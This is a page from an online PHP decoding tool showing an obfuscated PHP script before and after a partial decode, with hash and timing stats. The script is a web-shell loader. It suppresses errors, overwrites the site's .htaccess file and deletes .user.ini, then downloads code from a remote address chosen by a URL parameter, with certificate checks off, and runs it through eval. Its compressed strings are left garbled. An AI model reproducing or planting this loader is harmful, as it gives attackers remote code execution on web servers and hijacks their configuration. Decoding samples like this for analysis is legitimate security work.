Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
error_reporting(E_ALL^E_NOTICE);define('', '');$GLOBALS[] = explode('|||', gzinflate(subs..
Decoded Output download
<? error_reporting(E_ALL^E_NOTICE);define('', '');$GLOBALS[] = explode('|||', gzinflate(substr('
Rr0v`/\BH@{E7i>UY=:ZjS
,PY{A p(r4IK..27
vrX}[3[D0e[0sv;7 MnKh^^45tzF$4VM+Pt=/FX3Z}y&j|S#v#DVCT\'ixgS$\Lyq9M
8 "yCtlk#5$MMePI O}O<:_c)
xFgqm_hjX~!@JrqmavKM}
t pT:)CXC7P!HaJl<${scWJ',0x0a, -8)));
error_reporting(0);@ini_set($GLOBALS{}[0],NULL);@ini_set($GLOBALS{}{0x001},0);@ini_set($GLOBALS{}[0x0002],0);echo $GLOBALS{}{0x00003};if(isset($_GET[$GLOBALS{}[0x000004]])){$PvDde=base64_decode($GLOBALS{}{0x05});$dt68w=$_SERVER[$GLOBALS{}[0x006]];unlink("{$dt68w}/.htaccess");if(function_exists($GLOBALS{}{0x0007})){file_put_contents("{$dt68w}/.htaccess",$PvDde);}else{fwrite(fopen("{$dt68w}/.htaccess",$GLOBALS{}[0x00008]),$PvDde);}if(file_exists("{$dt68w}/.user.ini")){unlink("{$dt68w}/.user.ini");}}function curlFoxAuto($d15uw){$Au0oE=curl_init();curl_setopt($Au0oE,CURLOPT_TIMEOUT,0x01e);curl_setopt($Au0oE,CURLOPT_RETURNTRANSFER,!0);curl_setopt($Au0oE,CURLOPT_URL,$d15uw);curl_setopt($Au0oE,CURLOPT_USERAGENT,$GLOBALS{}{0x000009});curl_setopt($Au0oE,CURLOPT_FOLLOWLOCATION,!0);if(stristr($d15uw,$GLOBALS{}[0x0a])){curl_setopt($Au0oE,CURLOPT_SSL_VERIFYPEER,0);curl_setopt($Au0oE,CURLOPT_SSL_VERIFYHOST,0);}curl_setopt($Au0oE,CURLOPT_HEADER,!1);return curl_exec($Au0oE);}$PmArP=$GLOBALS{}{0x00b} .$_GET[$GLOBALS{}[0x000c]];if(empty($_GET[$GLOBALS{}{0x0000d}])){exit;}else{$pOXsz=file_get_contents($PmArP);if(empty($pOXsz)){$pOXsz=curlFoxAuto($PmArP);}$pOXsz=str_replace($GLOBALS{}[0x00000e],$GLOBALS{}{0x0f},$pOXsz);$pOXsz=str_replace($GLOBALS{}[0x0010],$GLOBALS{}{0x0f},$pOXsz);eval($pOXsz);} ?>
Did this file decode correctly?
Original Code
error_reporting(E_ALL^E_NOTICE);define('', '');$GLOBALS[] = explode('|||', gzinflate(substr('
Rr0v`/\BH@{E7i>UY=:ZjS
,PY{A p(r4IK\1..27
vrX}[3[D0e[0sv;7 MnKh^^45tzF$4VM+Pt=/FX3Z}y&j|S#v#DVCT\'ixgS$\Lyq9M
8 "yCtlk#5$MMePI O}O<:_c)
xFgqm_hjX~!@JrqmavKM}
t pT:)CXC7P!HaJl<${scWJ',0x0a, -8)));
error_reporting(0);@ini_set($GLOBALS{}[0],NULL);@ini_set($GLOBALS{}{0x001},0);@ini_set($GLOBALS{}[0x0002],0);echo $GLOBALS{}{0x00003};if(isset($_GET[$GLOBALS{}[0x000004]])){$PvDde=base64_decode($GLOBALS{}{0x05});$dt68w=$_SERVER[$GLOBALS{}[0x006]];unlink("{$dt68w}/.htaccess");if(function_exists($GLOBALS{}{0x0007})){file_put_contents("{$dt68w}/.htaccess",$PvDde);}else{fwrite(fopen("{$dt68w}/.htaccess",$GLOBALS{}[0x00008]),$PvDde);}if(file_exists("{$dt68w}/.user.ini")){unlink("{$dt68w}/.user.ini");}}function curlFoxAuto($d15uw){$Au0oE=curl_init();curl_setopt($Au0oE,CURLOPT_TIMEOUT,0x01e);curl_setopt($Au0oE,CURLOPT_RETURNTRANSFER,!0);curl_setopt($Au0oE,CURLOPT_URL,$d15uw);curl_setopt($Au0oE,CURLOPT_USERAGENT,$GLOBALS{}{0x000009});curl_setopt($Au0oE,CURLOPT_FOLLOWLOCATION,!0);if(stristr($d15uw,$GLOBALS{}[0x0a])){curl_setopt($Au0oE,CURLOPT_SSL_VERIFYPEER,0);curl_setopt($Au0oE,CURLOPT_SSL_VERIFYHOST,0);}curl_setopt($Au0oE,CURLOPT_HEADER,!1);return curl_exec($Au0oE);}$PmArP=$GLOBALS{}{0x00b} .$_GET[$GLOBALS{}[0x000c]];if(empty($_GET[$GLOBALS{}{0x0000d}])){exit;}else{$pOXsz=file_get_contents($PmArP);if(empty($pOXsz)){$pOXsz=curlFoxAuto($PmArP);}$pOXsz=str_replace($GLOBALS{}[0x00000e],$GLOBALS{}{0x0f},$pOXsz);$pOXsz=str_replace($GLOBALS{}[0x0010],$GLOBALS{}{0x0f},$pOXsz);eval($pOXsz);}
Function Calls
None |
Stats
MD5 | ecaa3e720d671f59f8b78b1d0e000e79 |
Eval Count | 0 |
Decode Time | 43 ms |